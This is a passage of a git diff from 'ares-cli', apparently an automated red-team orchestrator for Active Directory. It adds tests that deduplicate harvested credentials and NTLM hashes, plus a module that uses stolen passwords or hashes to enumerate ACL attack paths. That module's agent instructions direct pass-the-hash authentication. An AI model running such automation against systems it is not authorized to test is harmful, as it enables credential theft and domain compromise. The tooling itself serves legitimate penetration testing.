+fn strip_trailing_dot_removes_netexec_zero_artifact() {
+ use super::strip_trailing_dot;
+ // NetExec appends "0" or "0." to domain names
+ assert_eq!(strip_trailing_dot("contoso.local0"), "contoso.local");
+ assert_eq!(strip_trailing_dot("contoso.local0."), "contoso.local");
+ assert_eq!(
+ strip_trailing_dot("child.contoso.local0"),
+ "child.contoso.local"
+ );
+ assert_eq!(strip_trailing_dot("fabrikam.local0."), "fabrikam.local");
+ // Must NOT strip real trailing 0 from hostnames like "host10"
+ assert_eq!(strip_trailing_dot("host10"), "host10");
+ assert_eq!(
+ strip_trailing_dot("dc10.contoso.local"),
+ "dc10.contoso.local"
+ );
+}
+
#[test]
fn strip_ansi_removes_escape_sequences() {
use super::credentials::strip_ansi;
@@ -621,6 +640,26 @@ fn normalize_state_domains_domain_filtering_based_on_host_fqdns() {
assert!(!domains.contains(&"orphan.local".to_string()));
}
+#[test]
+fn normalize_state_domains_drops_host_fqdn_masquerading_as_domain() {
+ // A parser/credential publish path sometimes pushes a DC's FQDN
+ // (e.g. `WIN-30DZ5NGFA7M.c26h.local`) into the domain set. The dedup
+ // filter must drop entries that exactly match a known host hostname,
+ // even when a user or credential has the FQDN in its `domain` field.
+ let users = vec![make_user("win-30dz5ngfa7m.c26h.local", "admin")];
+ let mut creds = vec![];
+ let mut hashes = vec![];
+ let mut domains = vec![
+ "c26h.local".to_string(),
+ "win-30dz5ngfa7m.c26h.local".to_string(),
+ ];
+ let hosts = vec![make_host("192.168.58.10", "win-30dz5ngfa7m.c26h.local")];
+
+ normalize_state_domains(&users, &mut creds, &mut hashes, &mut domains, &hosts, None);
+
+ assert_eq!(domains, vec!["c26h.local".to_string()]);
+}
+
#[test]
fn normalize_state_domains_domain_kept_from_target_domain() {
// target_domain should cause that domain to be retained even without hosts/users.
@@ -1055,3 +1094,118 @@ fn dedup_credentials_normalizes_username_case() {
let deduped = dedup_credentials(&creds);
assert_eq!(deduped[0].username, "admin");
}
+
+#[test]
+fn is_ghost_machine_account_matches_nopac_pattern() {
+ use super::is_ghost_machine_account;
+ assert!(is_ghost_machine_account("WIN-G9FWV8ZNSCL$"));
+ assert!(is_ghost_machine_account("WIN-4D75DLR6UCC$"));
+ assert!(is_ghost_machine_account("win-bjak8xunhgd$"));
+ // without trailing $
+ assert!(is_ghost_machine_account("WIN-3KSGCLTS7NX"));
+}
+
+#[test]
+fn is_ghost_machine_account_rejects_real_hosts() {
+ use super::is_ghost_machine_account;
+ assert!(!is_ghost_machine_account("DC01$"));
+ assert!(!is_ghost_machine_account("WS01$"));
+ assert!(!is_ghost_machine_account("WIN-2019$")); // wrong length
+ assert!(!is_ghost_machine_account("administrator"));
+ assert!(!is_ghost_machine_account(""));
+}
+
+#[test]
+fn sanitize_credentials_drops_ghost_machine_accounts() {
+ let mut creds = vec![
+ make_cred("contoso.local", "WIN-G9FWV8ZNSCL$", "P@ss1"),
+ make_cred("contoso.local", "jdoe", "P@ss1"),
+ ];
+ sanitize_credentials(&mut creds);
+ assert_eq!(creds.len(), 1);
+ assert_eq!(creds[0].username, "jdoe");
+}
+
+#[test]
+fn dedup_hashes_collapses_bare_and_prefixed_same_user() {
+ // Parsers emit the same hash twice when secretsdump output mixes
+ // `Administrator:RID:...` (bare) and `DOMAIN\Administrator:RID:...` (prefixed)
+ // — bare gets empty domain, prefixed gets the resolved FQDN.
+ // The bare row should be folded into the prefixed one.
+ let hashes = vec![
+ make_hash("", "Administrator", "NTLM", "aabbccdd"),
+ make_hash("contoso.local", "Administrator", "NTLM", "aabbccdd"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].domain, "contoso.local");
+}
+
+#[test]
+fn dedup_hashes_keeps_distinct_users_sharing_hash() {
+ // Two different users can end up with identical NTLMs (shared password).
+ // They must NOT be folded together — dedup keys on
+ // (username, hash_type, hash_value), not just (hash_type, hash_value).
+ let hashes = vec![
+ make_hash("contoso.local", "Administrator", "NTLM", "deadbeefcafe"),
+ make_hash("contoso.local", "svc_backup", "NTLM", "deadbeefcafe"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 2);
+}
+
+#[test]
+fn dedup_hashes_bare_with_no_domain_sibling_kept() {
+ // If we only ever saw the bare form, we cannot infer a domain — keep it as-is.
+ let hashes = vec![make_hash("", "Administrator", "NTLM", "aabbccdd")];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].domain, "");
+}
+
+#[test]
+fn dedup_hashes_picks_longest_domain_when_multiple_known() {
+ // If the same user+hash appears with both a parent and a child domain (rare
+ // cross-forest replication artifact), prefer the longer/more-specific FQDN
+ // when filling in a bare entry.
+ let hashes = vec![
+ make_hash("", "krbtgt", "NTLM", "deadbeef"),
+ make_hash("contoso.local", "krbtgt", "NTLM", "deadbeef"),
+ make_hash("child.contoso.local", "krbtgt", "NTLM", "deadbeef"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ // The bare entry folds into the longest sibling; the two populated entries stay distinct.
+ assert_eq!(deduped.len(), 2);
+ let domains: Vec<&str> = deduped.iter().map(|h| h.domain.as_str()).collect();
+ assert!(domains.contains(&"contoso.local"));
+ assert!(domains.contains(&"child.contoso.local"));
+}
+
+#[test]
+fn dedup_hashes_drops_ghost_machine_accounts() {
+ let hashes = vec![
+ make_hash(
+ "contoso.local",
+ "WIN-4D75DLR6UCC$",
+ "NTLM",
+ "aad3b435b51404eeaad3b435b51404ee:da118ed665879916ceaacfb98e3ee74e",
+ ),
+ make_hash("contoso.local", "admin", "NTLM", "aabb"),
+ ];
+ let deduped = dedup_hashes(&hashes);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].username, "admin");
+}
+
+#[test]
+fn dedup_users_drops_ghost_machine_accounts() {
+ let nb = HashMap::new();
+ let mut ghost = make_user("contoso.local", "WIN-BJAK8XUNHGD$");
+ ghost.source = "kerberos_enum".to_string();
+ let mut real = make_user("contoso.local", "jdoe");
+ real.source = "kerberos_enum".to_string();
+ let users = vec![ghost, real];
+ let deduped = dedup_users(&users, &nb);
+ assert_eq!(deduped.len(), 1);
+ assert_eq!(deduped[0].username, "jdoe");
+}
diff --git a/ares-cli/src/dedup/users.rs b/ares-cli/src/dedup/users.rs
index c8087de8..9bd4abdc 100644
--- a/ares-cli/src/dedup/users.rs
+++ b/ares-cli/src/dedup/users.rs
@@ -2,7 +2,7 @@ use std::collections::HashMap;
use ares_core::models::User;
-use super::strip_trailing_dot;
+use super::{is_ghost_machine_account, strip_trailing_dot};
/// Noise usernames that should be filtered.
pub(super) const NOISE_USERNAMES: &[&str] = &[
@@ -81,6 +81,7 @@ pub(crate) fn dedup_users(users: &[User], netbios_to_fqdn: &HashMap,
exploited: &HashSet,
@@ -303,20 +308,57 @@ fn print_vulnerabilities(
return;
}
- let mut vulns: Vec<(&String, &VulnerabilityInfo)> = discovered.iter().collect();
- vulns.sort_by(|a, b| {
- a.1.priority
- .cmp(&b.1.priority)
- .then(a.1.vuln_type.cmp(&b.1.vuln_type))
- });
+ let mut exploitable: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+ let mut findings: Vec<(&String, &VulnerabilityInfo)> = Vec::new();
+ for (id, vuln) in discovered.iter() {
+ if vuln.priority <= EXPLOITABLE_PRIORITY_MAX {
+ exploitable.push((id, vuln));
+ } else {
+ findings.push((id, vuln));
+ }
+ }
+ let sort_vulns = |vulns: &mut Vec<(&String, &VulnerabilityInfo)>| {
+ vulns.sort_by(|a, b| {
+ a.1.priority
+ .cmp(&b.1.priority)
+ .then(a.1.vuln_type.cmp(&b.1.vuln_type))
+ });
+ };
+ sort_vulns(&mut exploitable);
+ sort_vulns(&mut findings);
+
+ let exploited_in_exploitable = exploitable
+ .iter()
+ .filter(|(id, _)| exploited.contains(*id))
+ .count();
- println!("Discovered Vulnerabilities ({}):", vulns.len());
+ println!(
+ "Exploitable Vulnerabilities ({}, {} exploited):",
+ exploitable.len(),
+ exploited_in_exploitable
+ );
+ if exploitable.is_empty() {
+ println!(" (none)");
+ } else {
+ print_vuln_table(&exploitable, exploited);
+ }
+ println!();
+
+ println!("Findings ({}):", findings.len());
+ if !findings.is_empty() {
+ print_vuln_table(&findings, exploited);
+ }
+ println!();
+}
+
+/// Render a single vulnerability table body (header + rows).
+fn print_vuln_table(vulns: &[(&String, &VulnerabilityInfo)], exploited: &HashSet) {
println!(
" {:<30} {:<20} {:>8} {:>9} Details",
"Type", "Target", "Priority", "Exploited"
);
println!(" {}", "-".repeat(100));
- for (vuln_id, vuln) in &vulns {
+ for (vuln_id, vuln) in vulns {
let is_exploited = exploited.contains(*vuln_id);
let exploited_mark = if is_exploited { "\u{2713}" } else { "\u{2717}" };
@@ -336,7 +378,6 @@ fn print_vulnerabilities(
vuln.vuln_type, vuln.target, vuln.priority, exploited_mark, details_display
);
}
- println!();
}
/// Format vulnerability details HashMap into a readable string.
@@ -422,10 +463,12 @@ fn print_attack_path(timeline_events: &[serde_json::Value]) {
.and_then(|v| v.as_str())
.unwrap_or("unknown event");
+ let already_critical = description.starts_with("CRITICAL:");
let desc_lower = description.to_lowercase();
- let is_critical = desc_lower.contains("krbtgt")
- || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
- || desc_lower.contains("domain admin");
+ let is_critical = !already_critical
+ && (desc_lower.contains("krbtgt")
+ || (desc_lower.contains("administrator") && desc_lower.contains("hash"))
+ || desc_lower.contains("domain admin"));
let prefix = if is_critical { "CRITICAL: " } else { "" };
let mitre = extract_mitre_from_event(event);
diff --git a/ares-cli/src/orchestrator/automation/acl.rs b/ares-cli/src/orchestrator/automation/acl.rs
index 6571c836..ad710096 100644
--- a/ares-cli/src/orchestrator/automation/acl.rs
+++ b/ares-cli/src/orchestrator/automation/acl.rs
@@ -5,9 +5,9 @@ use std::time::Duration;
use serde_json::json;
use tokio::sync::watch;
-use tracing::{info, warn};
+use tracing::{debug, info, warn};
-use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome};
use crate::orchestrator::state::*;
/// Extract steps from an ACL chain JSON value.
@@ -141,29 +141,45 @@ pub async fn auto_acl_chain_follow(
});
let priority = dispatcher.effective_priority("acl_abuse");
- match dispatcher
- .throttled_submit("acl_chain_step", "acl", payload, priority)
+ // Mark dedup on Submitted OR Deferred — Deferred means the task is
+ // safely in the deferred ZSET and the drain will retry it. Without
+ // this, the next 30s tick re-emits the same step and the deferred
+ // ZSET hits its per-type cap, silently dropping work.
+ let mark_dedup = match dispatcher
+ .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
.await
{
- Ok(Some(task_id)) => {
+ Ok(SubmissionOutcome::Submitted(task_id)) => {
info!(
task_id = %task_id,
step_key = %dedup_key,
"ACL chain step dispatched"
);
- // Mark as dispatched in both in-memory set and dedup
- {
- let mut state = dispatcher.state.write().await;
- state.dispatched_acl_steps.insert(dedup_key.clone());
- state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
- }
- let _ = dispatcher
- .state
- .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
- .await;
+ true
+ }
+ Ok(SubmissionOutcome::Deferred) => {
+ debug!(step_key = %dedup_key, "ACL chain step deferred (will retry via deferred drain)");
+ true
+ }
+ Ok(SubmissionOutcome::Dropped) => {
+ debug!(step_key = %dedup_key, "ACL chain step dropped (will reconsider next tick)");
+ false
+ }
+ Err(e) => {
+ warn!(err = %e, "Failed to dispatch ACL chain step");
+ false
+ }
+ };
+ if mark_dedup {
+ {
+ let mut state = dispatcher.state.write().await;
+ state.dispatched_acl_steps.insert(dedup_key.clone());
+ state.mark_processed(DEDUP_ACL_STEPS, dedup_key.clone());
}
- Ok(None) => {} // deferred or throttled
- Err(e) => warn!(err = %e, "Failed to dispatch ACL chain step"),
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_ACL_STEPS, &dedup_key)
+ .await;
}
}
}
@@ -174,6 +190,8 @@ mod tests {
use super::*;
use serde_json::json;
+ // --- extract_chain_steps ---
+
#[test]
fn extract_chain_steps_from_array() {
let chain = json!([{"source": "a"}, {"source": "b"}]);
@@ -213,6 +231,8 @@ mod tests {
assert!(extract_chain_steps(&chain).is_none());
}
+ // --- extract_source_user ---
+
#[test]
fn extract_source_user_from_source_key() {
let step = json!({"source": "admin"});
@@ -249,6 +269,8 @@ mod tests {
assert_eq!(extract_source_user(&step), "");
}
+ // --- extract_source_domain ---
+
#[test]
fn extract_source_domain_from_source_domain_key() {
let step = json!({"source_domain": "contoso.local"});
@@ -279,6 +301,8 @@ mod tests {
assert_eq!(extract_source_domain(&step), "");
}
+ // --- acl_step_dedup_key ---
+
#[test]
fn acl_step_dedup_key_basic() {
assert_eq!(acl_step_dedup_key(0, 0), "chain:0:step:0");
diff --git a/ares-cli/src/orchestrator/automation/acl_discovery.rs b/ares-cli/src/orchestrator/automation/acl_discovery.rs
new file mode 100644
index 00000000..7a75814c
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/acl_discovery.rs
@@ -0,0 +1,812 @@
+//! auto_acl_discovery -- discover ACL attack paths via targeted LDAP queries.
+//!
+//! Bridges the gap between BloodHound collection and ACL exploitation.
+//! BloodHound collects data, but the ACL chain analysis must be extracted
+//! and registered as discovered_vulnerabilities for `auto_dacl_abuse` to
+//! exploit.
+//!
+//! This module dispatches `ldap_acl_enumeration` tasks per domain to:
+//! 1. Query nTSecurityDescriptor on user/group/computer objects
+//! 2. Identify dangerous ACEs (GenericAll, WriteDacl, ForceChangePassword,
+//! GenericWrite, WriteOwner, Self-Membership)
+//! 3. Register discovered ACL paths as vulnerabilities
+//!
+//! Interval: 60s (heavy LDAP query, don't run too frequently).
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// The dangerous ACE types we want the recon agent to identify.
+const DANGEROUS_ACE_TYPES: &[&str] = &[
+ "GenericAll",
+ "GenericWrite",
+ "WriteDacl",
+ "WriteOwner",
+ "ForceChangePassword",
+ "Self-Membership",
+ "WriteMember",
+ "AllExtendedRights",
+ "WriteProperty",
+];
+
+/// Collect ACL discovery work items from current state.
+///
+/// Pure logic extracted from `auto_acl_discovery` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_acl_discovery_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() && state.hashes.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ // Skip dominated domains — once we own a domain there is nothing left
+ // for ACL escalation to discover there. Cross-trust ACL paths against
+ // un-owned domains still fire (they iterate other entries in
+ // all_domains_with_dcs).
+ if state.dominated_domains.contains(domain) {
+ continue;
+ }
+ // Use separate dedup keys for cred vs hash attempts so a failed
+ // password-based attempt (e.g., mislabeled credential domain)
+ // doesn't permanently block the hash-based path.
+ let dedup_key_cred = format!("acl_disc:{}:cred", domain.to_lowercase());
+ let dedup_key_hash = format!("acl_disc:{}:hash", domain.to_lowercase());
+ let dedup_key_trust = format!("acl_disc:{}:trust", domain.to_lowercase());
+
+ // Prefer same-domain cleartext cred, then fall back to trust-compatible
+ // cred (child→parent or cross-forest). Trust-based attempts use a
+ // separate dedup key so they don't block hash-based fallback.
+ let (cred, using_trust_cred) = if !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_cred)
+ {
+ let c = state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && c.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned();
+ (c, false)
+ } else {
+ (None, false)
+ };
+ let (cred, using_trust_cred) =
+ if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_trust) {
+ match state.find_trust_credential(domain) {
+ Some(c) => (Some(c), true),
+ None => (None, using_trust_cred),
+ }
+ } else {
+ (cred, using_trust_cred)
+ };
+
+ // Look for NTLM hash (PTH) — fires independently of cred attempt
+ let (ntlm_hash, ntlm_hash_username) =
+ if cred.is_none() && !state.is_processed(DEDUP_ACL_DISCOVERY, &dedup_key_hash) {
+ state
+ .hashes
+ .iter()
+ .find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && h.username.to_lowercase() == "administrator"
+ })
+ .or_else(|| {
+ state.hashes.iter().find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_delegation_account(&h.username)
+ })
+ })
+ .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone())))
+ .unwrap_or((None, None))
+ } else {
+ (None, None)
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ continue;
+ }
+
+ let dedup_key = if ntlm_hash.is_some() {
+ dedup_key_hash
+ } else if using_trust_cred {
+ dedup_key_trust
+ } else {
+ dedup_key_cred
+ };
+
+ // Collect known users in this domain to check ACEs against.
+ let domain_users: Vec = state
+ .credentials
+ .iter()
+ .filter(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .map(|c| c.username.clone())
+ .collect();
+
+ items.push(AclDiscoveryWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain: domain.clone(),
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ known_users: domain_users,
+ ntlm_hash,
+ ntlm_hash_username,
+ });
+ }
+
+ items
+}
+
+/// Dispatches LDAP ACE enumeration per domain to discover ACL attack paths.
+/// Only runs after BloodHound collection has been dispatched (to avoid
+/// duplicating effort).
+pub async fn auto_acl_discovery(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(30));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ info!("auto_acl_discovery: spawned, waiting 45s for initial recon");
+
+ // Wait for initial recon to populate domain controllers.
+ tokio::time::sleep(Duration::from_secs(45)).await;
+
+ info!("auto_acl_discovery: initial wait complete, entering main loop");
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("acl_discovery") {
+ debug!("auto_acl_discovery: technique not allowed");
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ let dcs = state.all_domains_with_dcs();
+ let creds = state.credentials.len();
+ let hashes = state.hashes.len();
+ info!(
+ dc_count = dcs.len(),
+ creds, hashes, "auto_acl_discovery: tick"
+ );
+ collect_acl_discovery_work(&state)
+ };
+
+ if work.is_empty() {
+ debug!("auto_acl_discovery: no work items");
+ } else {
+ info!(
+ count = work.len(),
+ "auto_acl_discovery: work items collected"
+ );
+ }
+
+ for item in work {
+ // When PTH hash is available, use the hash user's identity for the target domain
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() {
+ (
+ item.ntlm_hash_username
+ .clone()
+ .unwrap_or_else(|| item.credential.username.clone()),
+ String::new(),
+ item.domain.clone(),
+ )
+ } else {
+ (
+ item.credential.username.clone(),
+ item.credential.password.clone(),
+ item.credential.domain.clone(),
+ )
+ };
+ let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_acl_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": cred_user,
+ "password": cred_pass,
+ "domain": cred_domain,
+ },
+ "ace_types": DANGEROUS_ACE_TYPES,
+ "known_users": item.known_users,
+ "instructions": concat!(
+ "Enumerate ACL attack paths in this domain.\n\n",
+ "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ",
+ "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n",
+ " - Use ldap_search with the hash if it accepts one, OR\n",
+ " - Use rpcclient_command with the hash parameter to query DACLs via RPC.\n\n",
+ "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain, ",
+ "you MUST pass bind_domain= to ldap_search. ",
+ "Check the 'bind_domain' field in the task payload — if present, always pass it ",
+ "to ldap_search so the LDAP bind uses user@bind_domain.\n\n",
+ "If a password IS provided, use ldap_search with filter ",
+ "'(objectCategory=*)' and request the nTSecurityDescriptor attribute.\n\n",
+ "For each dangerous ACE found (GenericAll, WriteDacl, ForceChangePassword, ",
+ "GenericWrite, WriteOwner, Self-Membership on users/groups), register it as ",
+ "a vulnerability with EXACTLY these fields:\n",
+ " vuln_type: lowercase ACE type (e.g. 'forcechangepassword', 'genericall', ",
+ "'genericwrite', 'writedacl', 'writeowner', 'self_membership')\n",
+ " source: the user/group that HAS the permission (attacker)\n",
+ " target: the user/group/computer that is the TARGET (victim)\n",
+ " target_type: 'User', 'Group', or 'Computer'\n",
+ " domain: the domain where this ACE exists\n",
+ " source_domain: the domain of the source principal\n",
+ "Focus on ACEs where the source is a user we have credentials for.\n\n",
+ "IMPORTANT: Include ALL users discovered in the discovered_users array:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"acl_discovery\"}"
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+ if let Some(ref hash) = item.ntlm_hash {
+ payload["ntlm_hash"] = json!(hash);
+ }
+ if let Some(ref user) = item.ntlm_hash_username {
+ payload["hash_username"] = json!(user);
+ }
+
+ // ACL discovery is high-priority — it gates RBCD, shadow creds,
+ // and DACL abuse exploitation paths. Use priority 2 to compete
+ // with credential_access tasks rather than sitting behind them.
+ let priority = 2;
+ match dispatcher
+ .throttled_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ known_users = item.known_users.len(),
+ "ACL discovery dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_ACL_DISCOVERY, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_ACL_DISCOVERY, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ // Don't mark dedup on defer — the deferred queue will
+ // retry and we need the work item to remain eligible in
+ // case the deferred task never dispatches. Duplicate
+ // enqueues to the deferred queue are harmless (it dedupes
+ // by payload hash).
+ debug!(domain = %item.domain, "ACL discovery deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch ACL discovery");
+ }
+ }
+ }
+ }
+}
+
+struct AclDiscoveryWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+ known_users: Vec,
+ ntlm_hash: Option,
+ ntlm_hash_username: Option,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::orchestrator::state::StateInner;
+ use ares_core::models::Credential;
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key_cred = format!("acl_disc:{}:cred", "contoso.local");
+ let key_hash = format!("acl_disc:{}:hash", "contoso.local");
+ assert_eq!(key_cred, "acl_disc:contoso.local:cred");
+ assert_eq!(key_hash, "acl_disc:contoso.local:hash");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_ACL_DISCOVERY, "acl_discovery");
+ }
+
+ #[test]
+ fn dangerous_ace_types_not_empty() {
+ assert!(!DANGEROUS_ACE_TYPES.is_empty());
+ }
+
+ #[test]
+ fn dangerous_ace_types_contains_key_types() {
+ assert!(DANGEROUS_ACE_TYPES.contains(&"GenericAll"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteDacl"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"ForceChangePassword"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"GenericWrite"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteOwner"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"Self-Membership"));
+ }
+
+ #[test]
+ fn dangerous_ace_types_count() {
+ assert_eq!(DANGEROUS_ACE_TYPES.len(), 9);
+ }
+
+ #[test]
+ fn dangerous_ace_types_includes_write_property() {
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteProperty"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"AllExtendedRights"));
+ assert!(DANGEROUS_ACE_TYPES.contains(&"WriteMember"));
+ }
+
+ #[test]
+ fn dangerous_ace_types_no_duplicates() {
+ let mut seen = std::collections::HashSet::new();
+ for ace in DANGEROUS_ACE_TYPES {
+ assert!(seen.insert(*ace), "Duplicate ACE type: {ace}");
+ }
+ }
+
+ #[test]
+ fn dedup_key_case_normalized() {
+ let key1 = format!("acl_disc:{}", "CONTOSO.LOCAL".to_lowercase());
+ let key2 = format!("acl_disc:{}", "contoso.local");
+ assert_eq!(key1, key2);
+ }
+
+ #[test]
+ fn acl_discovery_payload_structure() {
+ let payload = serde_json::json!({
+ "technique": "ldap_acl_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": "admin",
+ "password": "P@ssw0rd!",
+ "domain": "contoso.local",
+ },
+ "ace_types": DANGEROUS_ACE_TYPES,
+ "known_users": ["admin", "jdoe"],
+ });
+ assert_eq!(payload["technique"], "ldap_acl_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ let ace_types = payload["ace_types"].as_array().unwrap();
+ assert_eq!(ace_types.len(), 9);
+ }
+
+ #[test]
+ fn credential_domain_preference() {
+ // Same-domain credential is preferred
+ let domain = "contoso.local";
+ let cred_same = "contoso.local";
+ let cred_other = "fabrikam.local";
+ assert_eq!(cred_same.to_lowercase(), domain.to_lowercase());
+ assert_ne!(cred_other.to_lowercase(), domain.to_lowercase());
+ }
+
+ #[test]
+ fn known_users_collection() {
+ let credentials = [
+ ("admin", "contoso.local"),
+ ("jdoe", "contoso.local"),
+ ("admin", "fabrikam.local"),
+ ];
+ let domain = "contoso.local";
+ let domain_users: Vec<&str> = credentials
+ .iter()
+ .filter(|(_, d)| d.to_lowercase() == domain.to_lowercase())
+ .map(|(u, _)| *u)
+ .collect();
+ assert_eq!(domain_users.len(), 2);
+ assert!(domain_users.contains(&"admin"));
+ assert!(domain_users.contains(&"jdoe"));
+ }
+
+ #[test]
+ fn acl_discovery_work_fields() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = AclDiscoveryWork {
+ dedup_key: "acl_disc:contoso.local:cred".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ known_users: vec!["admin".into(), "jdoe".into()],
+ ntlm_hash: None,
+ ntlm_hash_username: None,
+ };
+ assert_eq!(work.known_users.len(), 2);
+ assert_eq!(work.domain, "contoso.local");
+ }
+
+ // --- collect_acl_discovery_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_domain_controllers_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_acl_discovery_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].dedup_key, "acl_disc:contoso.local:cred");
+ assert_eq!(work[0].credential.username, "admin");
+ assert_eq!(work[0].credential.domain, "contoso.local");
+ assert!(work[0].known_users.contains(&"admin".to_string()));
+ }
+
+ #[test]
+ fn collect_multiple_domains_produces_work_for_each() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
